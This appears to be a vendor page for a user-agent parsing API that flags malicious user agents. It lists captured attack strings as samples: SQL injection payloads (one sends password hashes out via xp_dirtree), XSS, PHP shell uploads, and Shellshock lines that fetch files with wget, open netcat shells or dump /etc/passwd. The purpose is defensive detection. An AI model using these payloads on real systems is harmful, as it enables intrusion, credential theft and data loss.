Checking User Agents for abusive/malicious fragments

Some web servers don't handle user agents correctly, and criminals have found that by providing user agents in certain formats they can actually trick the web server to performing dangerous SQL queries or even executing terminal commands on the server. This can lead to a loss of data or to the server being compromised.

The API detects dozens of different approaches that we've caught criminals trying, and our user agent parser will warn you about if any user agents you send to us have dangerous fragments in them. If they do, you should be especially careful handling, displaying or storing the user agent.

SQL injection in user agents

So that you have a better idea of the sorts of things we're looking out for, here is a brief list of some sample user agents we've seen, which contain various different attempts at SQL injection. These are all actual user agent strings which we've either seen on the homepage of or have been sent through the API itself.

Note that not all of them are explicitly malicious, but a common approach to attacking sites via query injection is to run automated scans to find sites which will execute SQL; and then after that a human can come back and intentionally craft a customized attack specific to that site. Some of these are obvious rubbish, others look like they were generated by some kind of malfunctioning script, others look malicious - but either way, we'll let you know that something is very wrong with them and they should be handled carefully!

  • declare @h varchar(999)select @h= 1 +substring(name+ - +master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+ .cw5i7qycxhnxuoxfjxvnxmxyx1yx7zqed_kn2ikw + from sys.sql_logins WHERE principal_id=1;exec( xp_dirtree +@h+ c$ )
  • -1360' OR 1604=CAST((CHR(113)||CHR(113)||CHR(112)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (1604=1604) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(122)||CHR(98)||CHR(113)) AS NUMERIC) AND 'FBcz' LIKE 'FBcz
  • Opera/9.20 (Windows NT 6.0; U; en)))) AND UPDATEXML(1152,CONCAT(0x2e,0x7171707871,(SELECT (ELT(1152=1152,1))),0x717a7a6271),1788) AND (((9134=9134
  • Opera/9.20 (Windows NT 6.0; U; en))) AND (SELECT 5426 FROM(SELECT COUNT(*),CONCAT(0x7171707871,(SELECT (ELT(5426=5426,1))),0x717a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ((8593=8593
  • Opera/9.20 (Windows NT 6.0; U; en)) OR UPDATEXML(3867,CONCAT(0x2e,0x7171707871,(SELECT (ELT(3867=3867,1))),0x717a7a6271),5496)-- vWjM
  • Opera/9.80 (Windows NT 6.0; U; it) Presto/2.6.30 Version/10.61) AND EXTRACTVALUE(3433,CONCAT(0x5c,0x716a6b7071,(SELECT (ELT(3433=3433,1))),0x7171717a71))-- WLGR
  • 0\\\'XOR(if(now()=sysdate(),sleep(12),0))XOR\\\'Z
  • Mozilla/5.0/**/(X11;/**/U;/**/Linux/**/i686;/**/pt-BR;/**/rv:**/Gecko/20060523/**/Ubuntu/dapper/**/Firefox/" WHERE 6091=6091 AND ROW(2165,4364)>(SELECT COUNT(*),CONCAT(0x7171707071,(SELECT (ELT(2165=2165,1))),0x716a767a71,FLOOR(RAND(0)*2))x FROM (SELECT 5395 UNION SELECT 4247 UNION SELECT 4177 UNION SELECT 1022)a GROUP BY x)-- KOzk
  • tzBtWhwA\\\' OR 707=(SELECT 707 FROM PG_SLEEP(12))--
  • Firefox ; SLEEP(5); --

Command and code injection in user agents

This is a tiny sample of the millions of dangerous user agents we've captured over the years. Some try to inject JavaScript into the page (you can see that they have the alert() call; to try to find websites that inject user agents unsafely into the page. Others attempt to provide commands which they hope the server will execute (such as the ones with calls to /bin/bash etc), others attempt to inject server side code in the hope that the server will execute it (such as the calls to <?php. You can see a few which attempt a Shellshock attack.)

  • Firefox<script>alert(document.cookie);</script>
  • () { :;}; /bin/bash -c "wget -O /tmp/bbb
  • <?php file_put_contents("../../../../../hello.html", 'hacked by foobar'); ?>
  • X='() { (a)=>\' bash -c "echo wget -O/dev/null -q '' () { :;};/usr/bin/nc -lp 31337|/bin/bash -i 2>&1|/usr/bin/nc -lp 51359 @eval($_REQUEST['e']);
  • ''''//..///../././//.//..//..//..//k
  • <?php die('lol')?>/2.3.0 CPython/3.5.1 Windows/7
  • <?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p> Example Was Here !!</p> <br> <form action="" method="post" enctype="multipart/form-data"> Filename: <input type="file" name="file" /><input type="submit" value="Submit" />
  • ><img src=t onerror=alert('user-agent')>
  • () { :;}; /usr/bin/wget -O /tmp/bcd
  • () { :;};/usr/bin/rm -rf /tmp/bash
  • () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget ; curl ; fetch ; lwp-download ; GET ; lynx \");'
  • () { 3xAmP13;};echo \"Content-type: text/plain\"; echo; cat /etc/passwd;
  • (){ :; };uname -a > /dev/tcp/
  • <?php system('wget \"\" -O shell.php');?>
  • Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv: Gecko/20070817 IceWeasel/'<?php print(chr(49).chr(55).chr(73).chr(53).chr(51).chr(48).chr(86).chr(65).chr(117).chr(52)); ?>'
  • () { ignored; }; echo Content-Type: text/plain ; echo ; echo "bash_cve_2014_6271_rce Output : $((71+89))
  • () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"sleep 10;killall -9 perl;rm -rf /tmp/example.avi;mkdir /tmp/example.avi;cd /tmp/example.avi;wget;lwp-download;fetch;curl -O;perl zmuie;cd /tmp/;rm -rf example.avi*\");'
  • <?php echo 'hi'; ?>
  • Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)';declare @q varchar(99);set @q='\\' '\ftc'; exec master.dbo.xp_dirtree @q;--
  • () { (a)=>\' ping -c 3 -p 927fdi27gr73gl82ogue73i2gid7y2dj #

(The domains, IP addresses, usernames etc have been anonymized for these examples)

Use the API to detect and block dangerous requests

The API will detect and notify you of user agents that attempt to inject bad queries, commands, and code in to your servers via the user agent.

Get started now

The API is free to use and easy to set up, so why not get started right now.

Do you have a question? Get in touch! We'd love to help you.